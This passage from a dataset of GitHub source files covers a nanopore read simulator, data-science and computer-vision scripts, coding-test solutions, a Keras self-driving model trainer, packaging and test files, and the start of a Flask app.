adapter sequence and the barcode sequence are missing.\n return read\n elif errorMode == 2: # The absence of the barcode sequence. \n refRead = topAdapter + read + endAdapter\n return refRead\n else: # Incomplete barcode sequence.\n topRate = random.uniform(MISBASELINE, 1)\n incompTopBarcode = topBarcode[0:int(len(topBarcode)*(1-topRate))]\n\n endRate = random.uniform(MISBASELINE, 1)\n incompEndBarcode = endBarcode[0:int(len(endBarcode)*(1-endRate))]\n\n refRead = topAdapter + incompTopBarcode + read + incompEndBarcode + endAdapter\n return refRead\n else:\n pass\n\ndef getRefNegSeqs(inReadFile, inBarFile, inAdapterFile, outFile, ERRORMODELIST = [1, 2, 3], trueBarFile = 'trueBars.csv'):\n '''generate the negtive sequences.'''\n inReads = GSFF(inReadFile)\n inBars = GSFF(inBarFile)\n inAdapters = GSFF(inAdapterFile)\n outRefReads = []\n file = open(trueBarFile, 'w')\n file.write('top barcode,end barcode\\n')\n for read in inReads:\n errorMode = random.choice(ERRORMODELIST)\n barcode = random.choice(inBars)\n reverBarcode = reverse_complement(barcode)\n refRead = generateRefNegseq(topAdapter = inAdapters[0], \\\n topBarcode = barcode, \\\n read = read, \\\n endBarcode = reverBarcode, \\\n endAdapter = inAdapters[1], \\\n errorMode = errorMode)\n outRefReads.append(refRead)\n file.write('%s,%s\\n'%(barcode, reverBarcode))\n S2F(outRefReads, outFile)\n file.close()\n\ndef getSigBySeq(seq, index, output_folder, sigroot):\n sequence_to_true_signal((seq, index), output_folder = output_folder, sigroot = sigroot)\n\ndef getRefNegSigs(inRefNegFile, outSigsDir, sigRootName = 'timeSeries'):\n seq_list = get_seq_list(inRefNegFile)\n id_list = get_id_list(inRefNegFile)\n # zip_id_seq = list(zip(seq_list, id_list))\n outList = [outSigsDir for i in range(len(id_list))]\n rootList = [sigRootName for i in range(len(seq_list))]\n args = list(zip(seq_list, id_list, outList, rootList))\n isExists_out = os.path.exists(outSigsDir)\n if not isExists_out:\n os.makedirs(outSigsDir)\n\n pool = Pool(8)\n list(pool.starmap(getSigBySeq, args))\n pool.close()\n pool.join()\n # for seq in zip_id_seq:\n # sequence_to_true_signal(seq, output_folder = outSigsDir, sigroot = sigRootName)\n\ndef getSimNegs(inRefNegFile, outSimNegFile):\n cmd = 'bash fast_sim_reads.sh %s %s'%(inRefNegFile, outSimNegFile)\n os.system(cmd)\n\ndef mainFunction(inReadFile, inBarFile, inAdapterFile, outRefFile, outSimRefFile, outSigsDir, sigRootName = 'timeSeries', \n ERRORMODELIST = [1, 2, 3], trueBarFile = 'trueBars.csv'):\n getRefNegSeqs(inReadFile = inReadFile, inBarFile = inBarFile, inAdapterFile = inAdapterFile, \n outFile = outRefFile, ERRORMODELIST = ERRORMODELIST, trueBarFile = trueBarFile)\n\n getSimNegs(inRefNegFile = outRefFile, outSimNegFile = outSimRefFile)\n\n getRefNegSigs(inRefNegFile = outRefFile, outSigsDir = outSigsDir, sigRootName = sigRootName)\n\ndef get_parameters():\n \"\"\"This script generates noiseless nanopore signals based on DNA sequences\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--read-file', type=str, required=True,\n help='It is the fasta file that contains reads.')\n\n parser.add_argument('--barcode-file', type=str, required=True,\n help='It is the fasta file that contains the barcode sequences.')\n\n parser.add_argument('--adapter-file', type=str, required=True,\n help='It is the fasta file that contains the adapter sequences.')\n\n parser.add_argument('--ref-negtive-file', type=str, required=True,\n help='It is the fasta file containing the final reference negative sequences.')\n\n 
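# (A typical invocation of this simulator, with illustrative file names:\n    #\n    #     python mutiSampleONTSimulator.py --read-file reads.fasta \\\n    #         --barcode-file barcodes.fasta --adapter-file adapters.fasta \\\n    #         --ref-negtive-file ref_neg.fasta --sim-negtive-file sim_neg.fasta \\\n    #         --sim-sig-floder sim_sigs/ --sim-mode 0\n    # )\n    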
parser.add_argument('--sim-negtive-file', type=str, required=True,\n help='It is the fasta file containing the final simulated negative sequences.')\n\n parser.add_argument('--sim-sig-floder', type=str, required=True,\n help='It is the folder path containing the nanopore signals simulated based on the 6-mer model.')\n \n parser.add_argument('--sim-mode', type=int, required=False, default = 0,\n help='It is the mode of simulating data. If it is set to 0, it will only \\\n simulate the negative sequence, otherwise it will simulate the sequence that is successfully inserted into the barcode.')\n \n parser.add_argument('--true-bar-file', type=str, required=False, default = \"trueBars.csv\",\n help='It is a file implying the real barcode carried by the simulated sequence (top barcode, end barcode)') \n \n parser.add_argument('--sig-root', type=str, required=False, default = \"timeSeries\",\n help='It is the prefix to the filename of the nanopore signal being simulated.')\n\n args = parser.parse_args()\n\n return args\n\ndef main():\n\n args = get_parameters()\n if args.sim_mode == 0:\n BAR_ADA_ALLLOSE_LIST = [1 for i in range(60)]\n BAR_LOSE_LIST = [2 for i in range(20)]\n BAR_ABSENCE_LIST = [3 for i in range(20)]\n ERRORMODELIST = BAR_ADA_ALLLOSE_LIST + BAR_LOSE_LIST + BAR_ABSENCE_LIST\n random.shuffle(ERRORMODELIST)\n else:\n ERRORMODELIST = [0]\n\n mainFunction(inReadFile = args.read_file, \\\n inBarFile = args.barcode_file, \\\n inAdapterFile = args.adapter_file, \\\n outRefFile = args.ref_negtive_file, \\\n outSimRefFile = args.sim_negtive_file, \\\n outSigsDir = args.sim_sig_floder, \\\n ERRORMODELIST = ERRORMODELIST, \\\n trueBarFile = args.true_bar_file, \\\n sigRootName = args.sig_root)\n\nif __name__ == \"__main__\":\n main()\n\n \n","repo_name":"junhaiqi/MSNANOSIM","sub_path":"mutiSampleONTSimulator.py","file_name":"mutiSampleONTSimulator.py","file_ext":"py","file_size_in_byte":9398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17968713781","text":"'''\r\nCreated on Nov 23, 2016\r\n\r\n@author: felix\r\n'''\r\nfrom simu_funcs import *\r\nfrom simulation import *\r\nfrom plot_funcs import *\r\n \r\ndef main():\r\n while True:\r\n try:\r\n shares_input_str = ''\r\n trials_input_str = ''\r\n \r\n while not valid_share_str(shares_input_str):\r\n shares_input_str = input(\"Please enter a list of 4 integers separated by commas as number of shares to buy in parallel\\n\")\r\n shares_input_str = rm_ws(shares_input_str)\r\n\r\n while not valid_trial_str(trials_input_str):\r\n trials_input_str = input(\"Please enter the number of simulation trials\\n\")\r\n trials_input_str = rm_ws(trials_input_str)\r\n\r\n positions = [int(string) for string in shares_input_str.split(\",\")]\r\n num_trials = int(trials_input_str)\r\n this_simu = simulation(positions,num_trials)\r\n \r\n this_simu.simulate() # Run the simulation\r\n \r\n cumu_ret = this_simu.simulate_results # Collect the simulated results\r\n\r\n \r\n daily_ret = (cumu_ret/1000) - 1\r\n\r\n result_file = open('results.txt', 'w')\r\n for ii in np.arange(len(positions)):\r\n this_plot_data = daily_ret[:,ii]\r\n this_position_int = positions[ii]\r\n \r\n plot_simulation(this_plot_data, this_position_int) \r\n \r\n this_mean = np.mean(this_plot_data)\r\n this_std = np.std(this_plot_data)\r\n \r\n write_simulation(result_file, this_position_int, this_mean, this_std)\r\n\r\n result_file.close()\r\n print('results.txt saved.')\r\n\r\n break\r\n \r\n except KeyboardInterrupt:\r\n 
exit('Program terminated')\r\n        except:\r\n            pass\r\n    \r\n    exit('Program finished.')\r\nif __name__ == '__main__':\r\n    try:\r\n        main()\r\n    except EOFError:\r\n        pass","repo_name":"ds-ga-1007/assignment8","sub_path":"zl1271/assignment8.py","file_name":"assignment8.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"12337091183","text":"''' Solution process\n# Analysis \nLooking at the sample input/output, I noted the following.\n    prices[0] = 1 -> smaller than all 4 remaining values.\n    prices[1] = 2 -> smaller than the 3 remaining values excluding [1].\n    prices[2] = 3 -> among the rest excluding [1, 2], greater than 2 and equal to 3.\n    prices[3] = 2 -> smaller than the 1 remaining value excluding [1, 2, 3].\n    prices[4] = 3 -> excluding [1, 2, 3, 2], there are no remaining values to compare.\n\nIn other words, excluding the earlier entries and comparing each price with the values that come after it, adding +1 whenever it is less than or equal to a later value gives [4, 3, 1, 1, 0].\n'''\n\ndef solution(prices):\n    answer = [0] * len(prices)\n    \n    for i in range(len(prices)-1):\n        for j in range(i+1, len(prices)):\n            if prices[i] <= prices[j]:\n                answer[i] += 1\n    return answer\n\n","repo_name":"Yejin-Ha/Coding-Test","sub_path":"Programmers/Level2/주식가격.py","file_name":"주식가격.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
+{"seq_id":"21884947563","text":"from tool.get_session import GetSession\n\n\nclass ApiNoticePublished:\n    def api_notice_published_get(self, url, page_size, page_num, keywords=None):\n        session = GetSession().get_session()\n        params = {'action': 'listbypage',\n                  'pagesize': page_size,\n                  'pagenum': page_num,\n                  'keywords': keywords,\n                  'withoutcontent': 'true'}\n        return session.get(url, params=params)\n","repo_name":"bian-py/CIMP_API_test","sub_path":"api/api_notice_published.py","file_name":"api_notice_published.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"32349924503","text":"import cv2 as cv\nimport numpy as np\n\ncap = cv.VideoCapture('sal.mp4')\nfourcc = cv.VideoWriter_fourcc(*'XVID')\nout = cv.VideoWriter('./output.avi', fourcc, 22.0, (1440, 1440))\n'''\nfor i in range(10):\n    _, frame = cap.read()\n    cv.imshow('frame',frame)\n    cv.waitKey(1000)\n\ncv.destroyAllWindows()\n\n'''\ni = 0\nwhile(i < 700):\n\n    _, frame = cap.read()\n    if(_ == False):\n        break\n    \n    r, g, b = cv.split(frame)\n\n    r = r * 2\n    g = g * 5 \n    b = b * 10 \n\n    frame = cv.merge((r,g,b))\n    \n    out.write(frame)\n    i += 1\n\ncap.release()\nout.release()\ncv.destroyAllWindows()\nprint(i)","repo_name":"IlyaMbot/Video_with_py","sub_path":"edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"19766992293","text":"import os\nimport SimpleITK\nimport pydicom\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\nfrom PIL import Image\nimport csv\n\n\nfilename = 'stage_2_detailed_class_info.csv'\nimage_file = '/home/jinan/Datasets/Medical-datasets/chest-rsna/stage_2_train_images/'\nwith open(filename) as f:\n    reader = csv.reader(f)\n    header_row = next(reader)\n    count =0\n    for i in reader:\n        image_id = i[0]\n        img_name = image_file + image_id +'.dcm'\n        print(img_name)\n        ds = pydicom.read_file(img_name)\n        img = Image.fromarray(ds.pixel_array)\n        if i[1] =='Lung Opacity':\n            save_file = './abnormal'+'/Lung_Opacity_'+i[0]+'.png'\n\n        elif i[1] == 'Normal':\n            save_file = './normal'+'/'+i[1]+'-'+i[0]+'.png'\n\n        elif i[1] == 'No Lung Opacity / Not Normal':\n            save_file = 
'./abnormal'+'/'+'No-Not-Normal_'+i[0]+'.png'\n\n img.save(save_file)\n\n\n","repo_name":"DorisBao/BMAD","sub_path":"data_processing/chest/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"21884947563","text":"\"\"\"\nDIA packaged for use without COM registration using comtypes.\n\"\"\"\n\nimport sys\nimport pathlib\nimport ctypes\nimport comtypes\nfrom comtypes import client\nfrom . import _dia, cvconst\n\n\n__version__ = \"0.2.0\"\n\n\n_SCRIPT_DIR = pathlib.Path(__file__).resolve().parent\n\nif sys.maxsize > 2**32 - 1:\n _arch = \"amd64\"\nelse:\n _arch = \"x86\"\n\n_DIA_DLL = _SCRIPT_DIR / 'lib' / _arch / \"msdia140.dll\"\n\n\n#: The dia typelib module. Retrieved via :func:`comtypes.client.GetModule`.\n#:\n#: :meta hide-value:\ndia = client.GetModule(str(_DIA_DLL))\n\n\n_NoRegCoCreate = ctypes.WINFUNCTYPE(\n ctypes.HRESULT,\n ctypes.c_wchar_p,\n ctypes.POINTER(comtypes.GUID),\n ctypes.POINTER(comtypes.GUID),\n ctypes.POINTER(ctypes.c_void_p),\n\n)(_dia.NoRegCoCreatePtr)\n\n\ndef CreateObject(progid, interface=None):\n \"\"\"\n Create a DIA object from *progid* with the given *interface*.\n\n Since this is intended to be used without registering DIA, you should grab the progid as a class\n object from the :data:`dia` module variable.\n \"\"\"\n if interface is None:\n interface = comtypes.IUnknown\n\n clsid = comtypes.GUID.from_progid(progid)\n p = ctypes.POINTER(interface)()\n iid = interface._iid_\n _NoRegCoCreate(str(_DIA_DLL), ctypes.byref(clsid), ctypes.byref(iid), ctypes.byref(p))\n return client.GetBestInterface(p)\n","repo_name":"segevfiner/pydia2","sub_path":"pydia2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"8730753416","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read().replace('.. 
:changelog:', '')\n\nrequirements = [\n 'jellyfish',\n 'backport_collections',\n 'numpy',\n 'pylev',\n]\n\ntest_requirements = [\n 'fake-factory',\n 'unittest2',\n 'sphinx',\n 'sphinx_rtd_theme',\n]\n\nsetup(\n name='EHRcorral',\n version='0.0.3',\n description=\"EHRcorral cross-matches and links electronic medical records for the purpose of de-duplication\",\n long_description=readme + '\\n\\n' + history,\n author=\"Nikhil Haas\",\n author_email='nikhil@nikhilhaas.com',\n url='https://github.com/nsh87/ehrcorral',\n packages=[\n 'ehrcorral',\n ],\n package_dir={'ehrcorral': 'ehrcorral'},\n include_package_data=True,\n package_data={'ehrcorral': ['*.json']},\n install_requires=requirements,\n license=\"ISCL\",\n zip_safe=False,\n keywords='record linkage ehr patient matching',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: ISC License (ISCL)',\n 'Natural Language :: English',\n \"Programming Language :: Python :: 2\",\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n test_suite='tests',\n tests_require=test_requirements,\n use_2to3=True\n)\n","repo_name":"nsh87/ehrcorral","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"2956359066","text":"import pytest\nfrom src.main import *\n\nclass TestRelationSelect:\n @pytest.fixture(autouse=True)\n def setup(self):\n # Initialize Relation with SECTION.csv for testing\n self.relation = Relation(\"data/SECTION.csv\")\n\n def test_select_valid_query(self):\n query = {\"YearOffered\": 2018}\n selected_data = self.relation.select(query)\n for col, data in selected_data.items():\n for value in data:\n assert value == 2018 if col == \"YearOffered\" else True\n\n def test_select_valid_query_multiple_conditions(self):\n query = {\"YearOffered\": 2017, \"Prof\": \"newton\"}\n selected_data = self.relation.select(query)\n for col, data in selected_data.items():\n for value in data:\n assert (value == 2017 if col == \"YearOffered\" else (value == \"newton\" if col == \"Prof\" else True))\n\n def test_select_no_match(self):\n query = {\"YearOffered\": 1999} # Year not in data\n selected_data = self.relation.select(query)\n assert all(len(data) == 0 for data in selected_data.values())\n\n\nif __name__ == '__main__':\n pytest.main()\n","repo_name":"mirola01/cs440","sub_path":"src/main/python/final/cs440-final-project-main/tests/select_test.py","file_name":"select_test.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19560510494","text":"from __future__ import annotations\n\nimport unittest\n\nfrom lsst.daf.relation import ColumnExpression, Materialization, iteration, tests\n\n\nclass MaterializationTestCase(tests.RelationTestCase):\n \"\"\"Tests for the Materialization operation and relations based on it.\"\"\"\n\n def setUp(self) -> None:\n self.a = tests.ColumnTag(\"a\")\n self.engine = iteration.Engine(name=\"preferred\")\n self.leaf = self.engine.make_leaf(\n {self.a}, payload=iteration.RowSequence([{self.a: 0}, {self.a: 1}]), name=\"leaf\"\n )\n # Materializing a leaf just returns the leaf, so we add a Selection to\n # make applying it nontrivial.\n self.target = 
self.leaf.with_rows_satisfying(\n ColumnExpression.reference(self.a).gt(ColumnExpression.literal(0))\n )\n\n def test_attributes(self) -> None:\n \"\"\"Check that all UnaryOperation and Relation attributes have the\n expected values.\n \"\"\"\n relation = self.target.materialized(name_prefix=\"prefix\")\n assert isinstance(relation, Materialization)\n self.assertEqual(relation.columns, {self.a})\n self.assertEqual(relation.engine, self.engine)\n self.assertEqual(relation.min_rows, self.target.min_rows)\n self.assertEqual(relation.max_rows, self.target.max_rows)\n self.assertTrue(relation.is_locked)\n self.assertTrue(relation.name.startswith(\"prefix\"))\n\n def test_apply_simplify(self) -> None:\n \"\"\"Test that applying a Materialization to a leaf or an existing\n materialization does nothing.\n \"\"\"\n self.assertEqual(self.leaf.materialized(), self.leaf)\n self.assertEqual(self.target.materialized(name=\"a\").materialized(\"b\"), self.target.materialized(\"a\"))\n\n def test_iteration(self) -> None:\n \"\"\"Test Materialization execution in the iteration engine.\"\"\"\n relation = self.target.materialized(name=\"m\")\n self.assertEqual(\n list(self.engine.execute(relation)),\n [{self.a: 1}],\n )\n self.assertIsNotNone(relation.payload)\n self.assertIsInstance(relation.payload, iteration.MaterializedRowIterable)\n\n def test_str(self) -> None:\n \"\"\"Test str(Materialization) and\n str(UnaryOperationRelation[Materialization]).\n \"\"\"\n relation = self.target.materialized(name=\"m\")\n self.assertEqual(str(relation), f\"materialize['m']({self.target})\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lsst/daf_relation","sub_path":"tests/test_materialization.py","file_name":"test_materialization.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43799032563","text":"# 2002 추월\n# 31256 KB / 72 ms\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nin_ = {}\nout_ = []\nfor i in range(n):\n in_[input().rstrip()] = i\nfor _ in range(n):\n out_.append(input().rstrip())\n\ncnt = 0\nfor i in range(n-1):\n for j in range(i+1, n):\n if in_[out_[i]] > in_[out_[j]]:\n cnt += 1\n break\nprint(cnt)","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week17_230504/2002_추월/2002_정광배.py","file_name":"2002_정광배.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"72138277201","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os, cv2, time, pickle, fnmatch,math, shutil\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras.layers import Lambda, Conv2D, MaxPooling2D, Dropout, Dense, Flatten, Input, Activation, Concatenate\nimport keras.backend.tensorflow_backend as ktf\nfrom keras.optimizers import SGD, Adam\nfrom keras.models import Sequential\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LambdaCallback, Callback\n\n## 環境變數設置\n# 指定要使用哪一片GPU\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nos.environ['HDF5_USE_FILE_LOCKING']='FALSE'\n\n# 自動增長 GPU 記憶體用量\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\nconfig = tf.ConfigProto(allow_soft_placement=True)\nsession = 
tf.Session(config=config)\nktf.set_session(session)\ngraph = False \n\n## Path setup\nloaded_csv_path = '../../data/csv/straight_store.csv' # path of the training list\nmodel_save_path = '../../data/model/straight/' # where trained models are saved\ndataset = [] # holds the processed training data\n\n\n## Parameter setup\n# Size and channel count (rgb, gray...) of the images to train on\nimage_width = 400 \nimage_height = 400 \nimage_channel = 1\n\n# Fraction of all data used for validation\nvalidation_size = 0.2\n# Save the model every this many epochs\nsave_model_in_number_of_epoch = 30\n# steps_per_epoch* batch_size = number of images in training/validation set\nSteps_per_epoch = 200\ntraining_batch_size = 64\nvalidation_batch_size = 4\n# Number of training cycles\ntraining_cycle = 40\n\n\n\n# The data in the csv is not yet balanced (the amount of straight driving usually\n# far exceeds turning), so the two classes are balanced here for better training\n\ndef data_balance_and_augmention():\n    global dataset\n    # Read each column from the csv\n    dir_log = pd.read_csv(loaded_csv_path,usecols=[1,3]) # left dir, right dir\n    speed_log = pd.read_csv(loaded_csv_path,usecols=[2,4]) # left speed, right speed\n    filename_list= pd.read_csv(loaded_csv_path,usecols=[5]) # file names\n\n    # Convert the data to lists\n    dir_log = np.array(dir_log).tolist()\n    speed_log = np.array(speed_log).tolist()\n    filename_list = np.array(filename_list).tolist()\n\n    # Store the turning and straight-driving data separately\n    turn_dir_list = [] \n    turn_speed_list = []\n    turn_list_img = []\n    straight_dir_list = []\n    straight_speed_list = []\n    straight_list_img = []\n\n    # Iterate over all records\n    for i in range(len(dir_log)):\n        if dir_log[i][0] == 0: # left wheel direction 0 means turning\n            turn_dir_list.append(dir_log[i])\n            turn_speed_list.append(speed_log[i])\n            turn_list_img.append(filename_list[i])\n        else:\n            straight_dir_list.append(dir_log[i])\n            straight_speed_list.append(speed_log[i])\n            straight_list_img.append(filename_list[i])\n\n    # Augment the data\n    turn_dir_list_ = []\n    turn_speed_list_= []\n    turn_list_img_=[]\n    # While there is less turning data than straight data, duplicate the turning data\n    while(len(turn_dir_list_) < len(straight_dir_list)):\n        turn_dir_list_.extend(turn_dir_list)\n        turn_speed_list_.extend(turn_speed_list)\n        turn_list_img_.extend(turn_list_img)\n\n\n    # Concatenate the turning data and the straight data again\n    dir_log = []\n    speed_log = []\n    filename_list = []\n\n    dir_log.extend(turn_dir_list_)\n    dir_log.extend(straight_dir_list)\n    speed_log.extend(turn_speed_list_)\n    speed_log.extend(straight_speed_list)\n    filename_list.extend(turn_list_img_)\n    filename_list.extend(straight_list_img)\n\n    # Stitch the per-image records together one by one\n    for i in range(len(dir_log)):\n        data_frame = [] \n        data_frame.extend(speed_log[i])\n        data_frame.extend(dir_log[i])\n        data_frame.extend(filename_list[i])\n        dataset.append(data_frame)\n\n\n    dataset=pd.DataFrame(dataset)\n    dataset.rename(columns={0:'left_wheel_speed',1:'right_wheel_speed',2:'left_wheel_dir',3:'right_wheel_dir',4:'filename'},inplace=True)\n\n    return\n\n\n\n# Randomly shift images horizontally to diversify the data\ndef random_shift_image(image):\n    # Keep the offset between -80 and 80 (np.random.rand() is between 0 and 1)\n    delta_x = int(160 * (np.random.rand()-0.5))\n\n    # Shift the image delta_x pixels along the x axis\n    shift_image = np.roll(image, delta_x, axis=1)\n\n    # After shifting right, fill the blank on the left with black\n    if delta_x>0:\n        shift_image[:, :delta_x] = 0\n    # After shifting left, fill the blank on the right with black\n    elif delta_x<0:\n        shift_image[:, delta_x:] = 0\n    \n    # The left wheel speed should differ from the right by 0 ~ 10 to produce a normal correction\n    delta_left_speed = int(delta_x / 8) \n\n    return (shift_image, delta_left_speed)\n\n# Diversify the data\ndef vary_image(img_path, left_speed, left_dir, right_speed, right_dir):\n\n    # Turn the image into a (400, 400, channel_size) array\n    if(image_channel == 1):\n        img = cv2.imread(img_path, 0)\n    elif(image_channel == 3):\n        img = cv2.imread(img_path) \n    \n    img = cv2.resize(img, (image_width,image_height), fx=0, fy=0)\n    img = img.reshape(image_width, image_height, image_channel)\n\n    # Apply a random shift to the data\n    shift_image, shift_speed = random_shift_image(img)\n    \n    # Only apply the shift compensation when the frame is not blank\n    
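# (A quick sanity check of the correction, from random_shift_image() above,\n    # where delta_x spans roughly -80..80 px and delta_left_speed = int(delta_x / 8):\n    #\n    #     delta_x =  64  ->  shift_speed =  8\n    #     delta_x = -40  ->  shift_speed = -5\n    #     delta_x =   0  ->  shift_speed =  0   (no correction)\n    #\n    # so the left/right wheel difference stays inside the 0 ~ 10 band noted above.)\n    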
if left_speed > 0:\n left_speed = left_speed + shift_speed\n #如果 shift 後的速度值 < 0, 就當作 0 \n if left_speed < 0:\n left_speed = 0\n # 保有右輪速度, 只改變左輪速度, 就可以產生左右輪的差, 進行修正\n return shift_image, left_speed, left_dir, right_speed, right_dir\n\n\ndef generator(samples, batch_size, mode='default'):\n num_samples = len(samples)\n while 1: \n # 產生 1 個 batch 的資料\n sklearn.utils.shuffle(samples) # 打亂資料, 創造batch多樣性\n for offset in range(0, num_samples, batch_size):\n # 一次讀取 batch size筆資料\n batch_samples = samples[offset : offset + batch_size]\n\n images = []\n left_speeds = []\n left_dirs = []\n right_speeds = []\n right_dirs = []\n\n for image, left_speed, left_dir, right_speed, right_dir in zip(batch_samples['filename'], batch_samples['left_wheel_speed'], batch_samples['left_wheel_dir'], batch_samples['right_wheel_speed'], batch_samples['right_wheel_dir']): \n #增加資料多樣性\n varied_image, varied_left_speed, varied_left_dir, varied_right_speed, varied_right_dir = vary_image(image, left_speed, left_dir, right_speed, right_dir)\n # 將各類資料分開存, 以便後續處理 \n images.append(varied_image)\n left_speeds.append(varied_left_speed)\n left_dirs.append(varied_left_dir)\n right_speeds.append(varied_right_speed)\n right_dirs.append(varied_right_dir)\n\n # 將各類資料都轉成 array 格式, 才可以進行training\n X_train = np.array(images)\n y_train = np.array([left_speeds, left_dirs, right_speeds, right_dirs])\n left_speeds = np.array(left_speeds)\n left_dirs = np.array(left_dirs)\n right_speeds = np.array(right_speeds)\n right_dirs = np.array(right_dirs)\n \n # 回傳值, 但不會終止function\n yield X_train, [left_speeds, left_dirs, right_speeds, right_dirs]\n\n\ndef save_model(model_name):\n t = time.localtime()\n timestamp = time.strftime('%b-%d-%Y_%H-%M-%S', t)\n model_name = (model_path + model_name + '_' + timestamp + '.h5')\n \n return model_name\n\n\ndef define_training_network():\n # activation function\n losses = {\n \"right_dir_output\": \"binary_crossentropy\",\n \"left_dir_output\": \"binary_crossentropy\",\n \"left_speed_output\": \"mse\",\n \"right_speed_output\": \"mse\",\n }\n \n DROP_PROB = 0.7 #隨機丟掉神經元,可以避免overfitting\n\n main_input = Input(shape=(image_width, image_height,image_channel), name='main_input')\n ### convolution layer\n x = Conv2D(24, (3, 3), activation='relu', strides=(2, 2))(main_input)\n x = Conv2D(24, (3, 3), activation='relu', strides=(2, 2))(x)\n x = Conv2D(36, (5, 5), activation='relu', strides=(2, 2))(x)\n x = Conv2D(48, (5, 5), activation='relu', strides=(2, 2))(x)\n x = Conv2D(64, (3, 3), activation='relu')(x)\n x = Conv2D(64, (3, 3), activation='relu')(x)\n x = Conv2D(64, (3, 3), activation='relu')(x)\n ###\n\n x = Dropout(DROP_PROB)(x)\n x = Flatten()(x)\n\n ### fully connceted layer\n x = Dense(512)(x)\n x = Dense(128)(x)\n x = Dense(10)(x)\n ###\n\n left_speed_output = Dense(1, name='left_speed_output')(x)\n\n left_dir_input_from_speed = Dense(5, name='left_dir_input_from_speed')(left_speed_output)\n left_concat_layer= Concatenate()([left_dir_input_from_speed, x])\n left_dir_output = Dense(1, name='left_dir_output', activation='sigmoid')(left_concat_layer)\n\n right_speed_output = Dense(1, name='right_speed_output')(x)\n\n right_dir_input_from_speed = Dense(5,name='right_dir_input_from_speed')(right_speed_output)\n right_concat_layer= Concatenate()([right_dir_input_from_speed, x])\n right_dir_output = Dense(1,name='right_dir_output', activation='sigmoid')(right_concat_layer)\n \n model = Model(inputs=[main_input], outputs=[left_speed_output, left_dir_output, right_speed_output, right_dir_output])\n model.summary()\n 
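# The infinite yield-based batching pattern above, reduced to a self-contained
# sketch (a plain list stands in for the DataFrame; names are illustrative):
import random

def batch_generator(samples, batch_size):
    while True:                        # Keras-style generators never terminate
        random.shuffle(samples)        # reshuffle each pass for batch diversity
        for offset in range(0, len(samples), batch_size):
            yield samples[offset:offset + batch_size]

gen = batch_generator(list(range(10)), batch_size=4)
first_batch = next(gen)                # a list of up to 4 shuffled items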
model.compile(optimizer=\"adam\", loss=losses)\n # model summary \n\n return model\n\n\ndef train(model):\n # 將資料分成測試資料及驗證資料\n train_samples, validation_samples = train_test_split(dataset, test_size= validation_size)\n\n for cycle in range(training_cycle):\n #產生圖片batch\n train_batch_generator = generator(train_samples, training_batch_size)\n validation_batch_generator = generator(validation_samples, validation_batch_size)\n\n #訓練神經網路\n history_object = model.fit_generator(\n train_batch_generator, \n steps_per_epoch=Steps_per_epoch, \n validation_data=validation_batch_generator, \n validation_steps=len(validation_samples)/2, \n epochs=save_model_in_number_of_epoch, \n verbose=1)\n\n # 儲存 model\n h5_output = save_model(str(history_object.history['loss'][save_model_in_number_of_epoch-1]) + str(cycle)) \n model.save(h5_output)\n print(\"Model saved\")\n\n print('Cycle: ',cycle+1)\n\n\n\ndef main():\n data_balance_and_augmention()\n model = define_training_network()\n train(model)\n\nif __name__ == '__main__':\n main()\n","repo_name":"JoyingKuo/AI_AGV","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6419336034","text":"import logging, argparse, json, os\nfrom flask import Flask, request, jsonify\nfrom classificator_taxtags import search, init\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef rules_apply():\n quest_json = 